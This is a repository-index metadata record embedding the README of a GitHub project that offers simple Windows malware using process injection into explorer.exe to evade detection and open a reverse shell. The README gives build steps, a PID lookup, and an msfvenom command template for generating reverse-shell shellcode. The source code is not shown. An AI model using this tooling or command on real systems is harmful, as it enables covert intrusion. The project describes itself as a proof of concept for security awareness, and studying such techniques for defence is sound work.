{"id":20847282,"url":"https://github.com/jsmoreira02/process_injection","last_synced_at":"2025-03-12T11:43:17.923Z","repository":{"id":206089901,"uuid":"715707562","full_name":"Jsmoreira02/Process_Injection","owner":"Jsmoreira02","description":"Injection of malicious code into legitimate Windows processes for evasion and simple malware to gain unauthorized access, using the Windows API. Serves as proof of concept or intrusion detection exercises.","archived":false,"fork":false,"pushed_at":"2024-09-12T17:31:25.000Z","size":204,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-01-19T05:38:08.073Z","etag":null,"topics":["cybersecurity-awareness","cybsersecurity","hacking","malware-development","payload","process-injection","windows","windows-api"],"latest_commit_sha":null,"homepage":"","language":"C++","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Jsmoreira02.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-11-07T17:10:15.000Z","updated_at":"2024-09-12T17:31:28.000Z","dependencies_parsed_at":null,"dependency_job_id":"e3f7c1fe-285a-467d-8ea0-d0f1201024bb","html_url":"https://github.com/Jsmoreira02/Process_Injection","commit_stats":null,"previous_names":["jsmoreira02/wind0wsm4lware_"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Jsmoreira02%2FProcess_Injection","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Jsmoreira02%2FProcess_Injection/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Jsmoreira02%2FProcess_Injection/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Jsmoreira02%2FProcess_Injection/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Jsmoreira02","download_url":"https://codeload.github.com/Jsmoreira02/Process_Injection/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243213867,"owners_count":20254879,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cybersecurity-awareness","cybsersecurity","hacking","malware-development","payload","process-injection","windows","windows-api"],"created_at":"2024-11-18T02:19:33.656Z","updated_at":"2025-03-12T11:43:17.895Z","avatar_url":"https://github.com/Jsmoreira02.png","language":"C++","readme":"\n\u003cdiv\u003e\n    \u003cimg src=\"https://img.shields.io/badge/Language%20-C++-darkred.svg\" style=\"max-width: 100%;\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/Tools%20-Windows API-green.svg\" style=\"max-width: 100%;\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/Target OS%20-Windows 7..11-blue.svg\" style=\"max-width: 100%;\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/Project%20-Malware | Process Injection-grey.svg\" style=\"max-width: 100%;\"\u003e\n\u003c/div\u003e\n\n\n# Simple Windows malware | Process injection\n\nSimple payload for hacking Windows and process injection. Using the windows API for the C programming language. \n\n* **Windows API:** https://learn.microsoft.com/pt-br/windows/win32/apiindex/windows-api-list\n\n### **Process injection**\n\n![ezgif com-video-to-gif](https://github.com/Jsmoreira02/Wind0wsM4lware_/assets/103542430/090ca836-8c52-4feb-ba99-911b6dbabd90)\n\n\nProcess injection is an evasive attack method, that hackers use to gain access to the system by executing their malicious code in the address space of a legitimate process, hiding the malware and often not generating any suspicion about an attacker on the system, as the malicious code becomes difficult to detect. Process injections also evade detection by any antivirus, application control, or endpoint detection and response systems running on the network, because the infected processes are viewed as legitimate. \n\nHackers usually use less suspicious or more important system processes such as: svchost.exe, rundll32.exe or even explorer.exe.\n\n* **Explorer_injection.exe:** Performs a shell connection on the reverse target computer at the execution address of the explorer.exe process. \n\n#\n\n* **How to find the PID of a running windows process:**\n\n![Screenshot_20231107_182320](https://github.com/Jsmoreira02/Wind0wsM4lware_/assets/103542430/1d9ab09e-04ac-45e2-8894-dfca0117868f)\n\n\n```bash\n  tasklist | findstr \u003cprocess name\u003e\n```\n=\u003e CMD syntax: `Process_injection.exe \u003cPID\u003e`\n\n# Compiling | Install\n\n* **Installation:** \n```bash \ngit clone https://github.com/Jsmoreira02/Wind0wsM4lware_.git\ncd Wind0wsM4lware_\nmake\n```\n\n* **Compiling just one of the files with \"Makefile\":** `make Process_injection` `make Win_malware` `make explorer_injection`\n\n* **Compiling the code (Windows):** `g++ code.c -o code` or `make (In case mingw-w64 is installed)`\n\n# MinGW-w64 Instalation:\n\n**Debian/Ubuntu OS:** \n```bash \nsudo apt install mingw-w64-x86-64 (64-bits)\nor\nsudo apt install mingw-w64 (32-bits)\n```\n\n**Fedora**:\n```bash \nsudo dnf install mingw64-gcc-c++\n```\n\n**Arch Linux**:\n```bash \nsudo pacman -S mingw-w64-gcc\n```\n\n=\u003e More Info: https://www.mingw-w64.org/\n\n=\u003e Shellcode generator: `msfvenom -p \u003cPayload\u003e LHOST=\u003cIP\u003e LPORT=\u003cLOCAL PORT\u003e --platform windows --arch \u003cx64/x86\u003e -f c`\n\n# Warning:    \n\u003e I am not responsible for any illegal use or damage caused by this tool. It primarily serves as a proof of concept, is intended to raise awareness about cybersecurity and can be improved in many ways.\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjsmoreira02%2Fprocess_injection","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fjsmoreira02%2Fprocess_injection","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjsmoreira02%2Fprocess_injection/lists"}